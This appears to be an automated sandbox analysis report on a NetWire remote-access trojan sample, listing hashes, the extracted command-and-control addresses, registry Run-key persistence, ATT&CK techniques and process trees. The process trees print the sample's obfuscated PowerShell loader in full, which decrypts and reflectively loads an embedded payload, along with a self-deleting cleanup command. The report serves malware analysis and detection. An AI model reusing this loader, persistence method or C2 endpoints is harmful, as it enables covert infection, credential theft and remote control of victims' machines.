netwire | 991eecd487e1e8c192f651f100ce6790f87942a403550ad4469cfb90e1f8d2dc

Analysis

max time kernel
95s
max time network
97s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
01-03-2023 06:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rFuDj.cmd
Size

332KB
MD5

02a8d87db6d29b1baab0f1b9e71834d7
SHA1

934f99d43f6b983f57156c4dd56bba26fd4065bd
SHA256

8a59fe8ca31ce4abde54d02705f65ed0d788e384e0d5c05441971f4d1fef5b34
SHA512

8ff8e13ac50f95d1a19174093f1337aaa54a4199872bfa96dc45545a79600be71694cb72ee9e59c064b8c851f2e1f7856ff2f3c96fc5d073adb4ef06a97fb99f
SSDEEP

6144:6917wECPZ87yAlTLuGNaqzD1zV3ITby8EP7S7PNbecS3kKbwREdxsSi7yqr+QyQ:691Wx8uc2WtI4P+7P0EK+uA

Score

10^/10

netwire botnet persistence stealer

Malware Config

Extracted

Family

netwire

184.75.221.211:5614

213.152.162.5:5614

194.36.111.59:5614

62.102.148.156:5614

217.151.98.163:5614

Attributes

activex_autorun
false
copy_executable
false
delete_original
false
host_id
HostId-%Rand%
lock_executable
false
mutex
QuFDTHWH
offline_keylogger
false
password
Password
registry_autorun
false
use_mutex
false

Signatures

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rFuDj.cmd.exerFuDj.cmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	rFuDj.cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	rFuDj.cmd.exe

Executes dropped EXE 2 IoCs

Processes:

rFuDj.cmd.exerFuDj.cmd.exe

pid process

1100 rFuDj.cmd.exe
624 rFuDj.cmd.exe

pid	process
1100	rFuDj.cmd.exe
624	rFuDj.cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

rFuDj.cmd.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker_rFuDj = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\rFuDj.vbs\" \"C:\\Users\\Admin\\AppData\\Roaming\\rFuDj.cmd\""	rFuDj.cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

powershell.exerFuDj.cmd.exepowershell.exepowershell.exerFuDj.cmd.exepowershell.exe

pid	process
1436	powershell.exe
1436	powershell.exe
1100	rFuDj.cmd.exe
1100	rFuDj.cmd.exe
1800	powershell.exe
1800	powershell.exe
1800	powershell.exe
4168	powershell.exe
4168	powershell.exe
1800	powershell.exe
1800	powershell.exe
4168	powershell.exe
624	rFuDj.cmd.exe
624	rFuDj.cmd.exe
624	rFuDj.cmd.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe
960	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exerFuDj.cmd.exepowershell.exepowershell.exerFuDj.cmd.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	1100	rFuDj.cmd.exe
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	4168	powershell.exe
Token: SeDebugPrivilege	624	rFuDj.cmd.exe
Token: SeDebugPrivilege	960	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

cmd.exerFuDj.cmd.execmd.exerFuDj.cmd.exe

description	pid	process	target process
PID 1352 wrote to memory of 1436	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1436	1352	cmd.exe	powershell.exe
PID 1352 wrote to memory of 1100	1352	cmd.exe	rFuDj.cmd.exe
PID 1352 wrote to memory of 1100	1352	cmd.exe	rFuDj.cmd.exe
PID 1352 wrote to memory of 1100	1352	cmd.exe	rFuDj.cmd.exe
PID 1100 wrote to memory of 1800	1100	rFuDj.cmd.exe	powershell.exe
PID 1100 wrote to memory of 1800	1100	rFuDj.cmd.exe	powershell.exe
PID 1100 wrote to memory of 1800	1100	rFuDj.cmd.exe	powershell.exe
PID 1100 wrote to memory of 1400	1100	rFuDj.cmd.exe	cmd.exe
PID 1100 wrote to memory of 1400	1100	rFuDj.cmd.exe	cmd.exe
PID 1100 wrote to memory of 1400	1100	rFuDj.cmd.exe	cmd.exe
PID 1400 wrote to memory of 4168	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 4168	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 4168	1400	cmd.exe	powershell.exe
PID 1400 wrote to memory of 624	1400	cmd.exe	rFuDj.cmd.exe
PID 1400 wrote to memory of 624	1400	cmd.exe	rFuDj.cmd.exe
PID 1400 wrote to memory of 624	1400	cmd.exe	rFuDj.cmd.exe
PID 624 wrote to memory of 960	624	rFuDj.cmd.exe	powershell.exe
PID 624 wrote to memory of 960	624	rFuDj.cmd.exe	powershell.exe
PID 624 wrote to memory of 960	624	rFuDj.cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rFuDj.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\Users\Admin\AppData\Local\Temp\rFuDj.cmd.exe
"C:\Users\Admin\AppData\Local\Temp\rFuDj.cmd.exe" function rZ($v){$v.Replace('@', '')}$mBAY=rZ 'Sp@l@it@';$vdOB=rZ 'Fr@om@B@a@se@64S@t@ri@n@g@';$aiyV=rZ 'En@tr@yPo@int@';$DswV=rZ 'Re@adA@ll@Tex@t@';$sild=rZ 'Tr@ansf@orm@Fi@n@a@lB@lo@c@k@';$ulOb=rZ 'Lo@ad@';$goUT=rZ 'Get@Cu@rre@n@t@Proc@es@s@';$SCej=rZ 'Inv@oke@';$QFFH=rZ 'Ch@a@ng@eE@xte@n@s@i@on@';$dClH=rZ 'Crea@teD@e@c@rypt@or@';function wCQOh($IiFXF,$tVdxP,$zVEbn){$HZLvB=[System.Security.Cryptography.Aes]::Create();$HZLvB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HZLvB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$HZLvB.Key=[System.Convert]::$vdOB($tVdxP);$HZLvB.IV=[System.Convert]::$vdOB($zVEbn);$VhSXk=$HZLvB.$dClH();$PHJLL=$VhSXk.$sild($IiFXF,0,$IiFXF.Length);$VhSXk.Dispose();$HZLvB.Dispose();$PHJLL;}function DDMJr($IiFXF){$utBTi=New-Object System.IO.MemoryStream(,$IiFXF);$RSEqk=New-Object System.IO.MemoryStream;$iyxFQ=New-Object System.IO.Compression.GZipStream($utBTi,[IO.Compression.CompressionMode]::Decompress);$iyxFQ.CopyTo($RSEqk);$iyxFQ.Dispose();$utBTi.Dispose();$RSEqk.Dispose();$RSEqk.ToArray();}function DREJZ($IiFXF,$tVdxP){[System.Reflection.Assembly]::$ulOb([byte[]]$IiFXF).$aiyV.$SCej($null,$tVdxP);}$wBczg=[System.IO.File]::$DswV([System.IO.Path]::$QFFH([System.Diagnostics.Process]::$goUT().MainModule.FileName, $null)).$mBAY([Environment]::NewLine);$Eqxgv = $wBczg[0].Substring(2).$mBAY('\');$xsaSh=DDMJr (wCQOh ([Convert]::$vdOB($Eqxgv[0])) $Eqxgv[2] $Eqxgv[3]);$BztYH=DDMJr (wCQOh ([Convert]::$vdOB($Eqxgv[1])) $Eqxgv[2] $Eqxgv[3]);DREJZ $BztYH $null;DREJZ $xsaSh $null;
2⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1100);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1800

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\rFuDj.cmd" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden -c #
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Users\Admin\AppData\Roaming\rFuDj.cmd.exe
"C:\Users\Admin\AppData\Roaming\rFuDj.cmd.exe" function rZ($v){$v.Replace('@', '')}$mBAY=rZ 'Sp@l@it@';$vdOB=rZ 'Fr@om@B@a@se@64S@t@ri@n@g@';$aiyV=rZ 'En@tr@yPo@int@';$DswV=rZ 'Re@adA@ll@Tex@t@';$sild=rZ 'Tr@ansf@orm@Fi@n@a@lB@lo@c@k@';$ulOb=rZ 'Lo@ad@';$goUT=rZ 'Get@Cu@rre@n@t@Proc@es@s@';$SCej=rZ 'Inv@oke@';$QFFH=rZ 'Ch@a@ng@eE@xte@n@s@i@on@';$dClH=rZ 'Crea@teD@e@c@rypt@or@';function wCQOh($IiFXF,$tVdxP,$zVEbn){$HZLvB=[System.Security.Cryptography.Aes]::Create();$HZLvB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$HZLvB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$HZLvB.Key=[System.Convert]::$vdOB($tVdxP);$HZLvB.IV=[System.Convert]::$vdOB($zVEbn);$VhSXk=$HZLvB.$dClH();$PHJLL=$VhSXk.$sild($IiFXF,0,$IiFXF.Length);$VhSXk.Dispose();$HZLvB.Dispose();$PHJLL;}function DDMJr($IiFXF){$utBTi=New-Object System.IO.MemoryStream(,$IiFXF);$RSEqk=New-Object System.IO.MemoryStream;$iyxFQ=New-Object System.IO.Compression.GZipStream($utBTi,[IO.Compression.CompressionMode]::Decompress);$iyxFQ.CopyTo($RSEqk);$iyxFQ.Dispose();$utBTi.Dispose();$RSEqk.Dispose();$RSEqk.ToArray();}function DREJZ($IiFXF,$tVdxP){[System.Reflection.Assembly]::$ulOb([byte[]]$IiFXF).$aiyV.$SCej($null,$tVdxP);}$wBczg=[System.IO.File]::$DswV([System.IO.Path]::$QFFH([System.Diagnostics.Process]::$goUT().MainModule.FileName, $null)).$mBAY([Environment]::NewLine);$Eqxgv = $wBczg[0].Substring(2).$mBAY('\');$xsaSh=DDMJr (wCQOh ([Convert]::$vdOB($Eqxgv[0])) $Eqxgv[2] $Eqxgv[3]);$BztYH=DDMJr (wCQOh ([Convert]::$vdOB($Eqxgv[1])) $Eqxgv[2] $Eqxgv[3]);DREJZ $BztYH $null;DREJZ $xsaSh $null;
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:624

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(624);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:960

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
33b19d75aa77114216dbc23f43b195e3

SHA1
36a6c3975e619e0c5232aa4f5b7dc1fec9525535

SHA256
b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2

SHA512
676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rFuDj.cmd.exe.log
Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
50a8221b93fbd2628ac460dd408a9fc1

SHA1
7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

SHA256
46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

SHA512
27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
792990b0a0aff3a4456815e3e69a3bcf

SHA1
421486e70210154bf0baced948e1c3c25d8376ed

SHA256
d4e1dfe7910c7a9a9ddd04457ac040bab042895cb0590d312ef7ed63eb83be52

SHA512
b3bc964279753786875352eb718e7fb52987fb75b58567007d034f72c4ab43cb1e3502aedb2aff8446e4d598229c6d54672038a5adc8b76f7767ca2daf7042c0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
10KB

MD5
34b5b4f6848a8a74f435167de65c17de

SHA1
e5a240e60a42c599951faf61b9b4dd8e6833c258

SHA256
7078363cd0029a83b23a7fa221ccacfdda7cfd3b6a5aea7aebcee5be6f255200

SHA512
dcaf8041915404ed6a67cbb5e01f9963e9d86ae538be1aaa65a2f0d04f48b0530bf2edf4b603073d4c8dbb1ade124268c25d0e55b48efccfa7661b29ab48b07d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
900f185bc12d4005e935c4fc70f84da9

SHA1
0f78e84235880ca072c20c9b03dff4ceb7977b86

SHA256
b487220d3de82615c31e38259f3610c2db8e5c8d42d9992ecc0d0b5397fe2e09

SHA512
bfb85449508f7ddfb0b680079b650b9ea24f616aba8bb470b29215b0b29cb53288c6c5c8ee044827ef5b052a7248e4e51da7b06d75f8796d1537c60d6a4431f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yfaimmgt.q3v.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rFuDj.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\rFuDj.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\rFuDj.cmd
Filesize
332KB

MD5
02a8d87db6d29b1baab0f1b9e71834d7

SHA1
934f99d43f6b983f57156c4dd56bba26fd4065bd

SHA256
8a59fe8ca31ce4abde54d02705f65ed0d788e384e0d5c05441971f4d1fef5b34

SHA512
8ff8e13ac50f95d1a19174093f1337aaa54a4199872bfa96dc45545a79600be71694cb72ee9e59c064b8c851f2e1f7856ff2f3c96fc5d073adb4ef06a97fb99f

Download Submit
C:\Users\Admin\AppData\Roaming\rFuDj.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\rFuDj.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\rFuDj.cmd.exe
Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
memory/624-221-0x0000000004E60000-0x0000000004E70000-memory.dmp

Filesize
64KB

Download
memory/624-246-0x0000000004E60000-0x0000000004E70000-memory.dmp

Filesize
64KB

Download
memory/624-229-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/624-223-0x0000000004E60000-0x0000000004E70000-memory.dmp

Filesize
64KB

Download
memory/624-222-0x0000000004E60000-0x0000000004E70000-memory.dmp

Filesize
64KB

Download
memory/624-245-0x0000000004E60000-0x0000000004E70000-memory.dmp

Filesize
64KB

Download
memory/960-247-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

Filesize
64KB

Download
memory/960-248-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

Filesize
64KB

Download
memory/960-244-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

Filesize
64KB

Download
memory/960-243-0x0000000004CA0000-0x0000000004CB0000-memory.dmp

Filesize
64KB

Download
memory/1100-151-0x0000000004A50000-0x0000000004A60000-memory.dmp

Filesize
64KB

Download
memory/1100-150-0x0000000005090000-0x00000000056B8000-memory.dmp

Filesize
6.2MB

Download
memory/1100-169-0x00000000063E0000-0x00000000063FA000-memory.dmp

Filesize
104KB

Download
memory/1100-167-0x0000000004A50000-0x0000000004A60000-memory.dmp

Filesize
64KB

Download
memory/1100-168-0x0000000008690000-0x0000000008D0A000-memory.dmp

Filesize
6.5MB

Download
memory/1100-155-0x0000000004FF0000-0x0000000005056000-memory.dmp

Filesize
408KB

Download
memory/1100-152-0x0000000004A50000-0x0000000004A60000-memory.dmp

Filesize
64KB

Download
memory/1100-149-0x00000000048E0000-0x0000000004916000-memory.dmp

Filesize
216KB

Download
memory/1100-153-0x0000000004E60000-0x0000000004E82000-memory.dmp

Filesize
136KB

Download
memory/1100-166-0x0000000005E30000-0x0000000005E4E000-memory.dmp

Filesize
120KB

Download
memory/1100-154-0x0000000004F10000-0x0000000004F76000-memory.dmp

Filesize
408KB

Download
memory/1436-142-0x000001796CA00000-0x000001796CA22000-memory.dmp

Filesize
136KB

Download
memory/1800-224-0x0000000007780000-0x0000000007D24000-memory.dmp

Filesize
5.6MB

Download
memory/1800-220-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/1800-219-0x0000000007060000-0x0000000007082000-memory.dmp

Filesize
136KB

Download
memory/1800-218-0x0000000007130000-0x00000000071C6000-memory.dmp

Filesize
600KB

Download
memory/1800-189-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/1800-190-0x0000000004C70000-0x0000000004C80000-memory.dmp

Filesize
64KB

Download
memory/4168-191-0x0000000002D30000-0x0000000002D40000-memory.dmp

Filesize
64KB

Download